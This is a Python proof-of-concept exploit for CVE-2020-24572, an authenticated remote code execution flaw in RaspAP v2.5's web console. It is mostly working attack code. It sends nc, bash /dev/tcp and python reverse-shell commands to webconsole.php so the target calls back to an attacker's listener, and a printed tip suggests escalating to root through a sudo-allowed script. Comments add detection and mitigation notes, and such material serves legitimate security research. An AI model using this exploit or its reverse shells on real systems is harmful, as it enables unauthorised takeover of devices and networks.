#/usr/bin/python3
#####################################################
### Proof of Concept for CVE-2020-24572 ###
### (Authenticated) Remote Code Execution ###
### via Webconsole.php in ###
### RaspAP v2.5 ###
### github.com/billz/raspap-webgui ###
### github.com/nickola/web-console ###
#####################################################
### Re-Written by: gerberop Date:03/31/2021 ###
#####################################################
### Credit: lunchb0x - Disc. Date: 08/24/2020 ###
#####################################################
### github.com/gerberop/CVE-2020-24572 ###
#####################################################
import os
import sys
import requests
from termcolor import colored
# Command-line contract: exactly six positional arguments, as listed in the
# usage banner. The values are taken from argv verbatim; nothing below
# validates them (the port values stay strings and are interpolated as-is).
if len(sys.argv) != 7:
    print("-------------------------------------------------------------------------------------------------")
    print("USAGE: rasp_pwn.py [target_ip] [port] [attacker_ip] [attacker_port] [RaspAP_admin_pass] [payload]")
    print("-------------------------------------------------------------------------------------------------")
    print("Payload options: \n1. nc reverse shell\n2. bash reverse shell\n3. python reverse shell")
    print("-------------------------------------------------------------------------------------------------")
    exit(1)
# Target host/port and the host/port the shell is expected to connect back to.
target = sys.argv[1]
port = sys.argv[2]
listener_ip = sys.argv[3]
listener_port = sys.argv[4]
# The RaspAP account is hard-coded to "admin"; only its password is supplied.
# This is the "authenticated" half of the CVE title: valid admin credentials
# are a precondition, so credential hygiene on the RaspAP login is the first
# line of defence.
raspap_user = "admin"
raspap_pass = sys.argv[5]
payload = sys.argv[6]
# Select the shell command that will be submitted to the web console. Only the
# three options from the usage banner are handled; any other value leaves `cmd`
# unbound, and the script then fails with a NameError when json_req_1 is built.
if payload == '1':
    cmd = f"nc -e /bin/bash {listener_ip} {listener_port}"
elif payload == '2':
    cmd = f"/bin/bash -c 'bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1'"
elif payload == '3':
    cmd = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_ip}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
# HTTP Basic auth with the RaspAP admin credentials. Beyond that, the bundled
# web console does not appear to require a login of its own (see the
# "NO_LOGIN" marker below), so the admin password alone gates command execution.
session = requests.Session()
session.auth = (raspap_user, raspap_pass)
# JSON-RPC 2.0 request understood by the web-console backend. The "run" method
# executes the third element of "params" as a shell command on the host; the
# first element, "NO_LOGIN", and the empty user/hostname/path state stand in
# for console session state. For detection purposes, a POST to
# /includes/webconsole.php whose body carries "method":"run" is the request to
# alert on; mitigation is to remove or disable the web console (or update to a
# RaspAP release that no longer ships it in this form) and to rotate the admin
# password if such requests are seen.
json_req_1 = {
    "jsonrpc":"2.0",
    "method":"run",
    "params":["NO_LOGIN",
    {"user":"","hostname":"","path":""},
    f"{cmd}"
    ],
    "id":6
}
print(colored("[!]", 'green') + f" Using Reverse Shell: {cmd}")
print(colored("[!]", 'yellow') + " Sending activation request - Make sure your listener is running . . .")
input(colored("[>>>]", 'green')+" Press ENTER to continue . . .")
# Restore terminal echo in case input() left it disabled; repeated below.
os.system("stty echo")
# NOTE(review): these two status messages are printed *before* the request is
# sent, so they do not reflect whether anything actually happened.
print(colored("\n[!]", 'green') + " You should have a shell :)")
print(colored("\n[!]", 'red') + " Remember to check sudo -l to see if you can get root through /etc/raspap/lighttpd/configport.sh")
os.system("stty echo")
# The request is sent over plain HTTP, so the Basic-auth credentials and the
# command travel in clear text. The response (`r`) is never inspected: a 401
# from bad credentials or a non-2xx from the console still ends in "Done.".
r = session.post("http://%s:%s/includes/webconsole.php"%(target,port), json=json_req_1)
print(colored("[*]", 'green') + " Done.")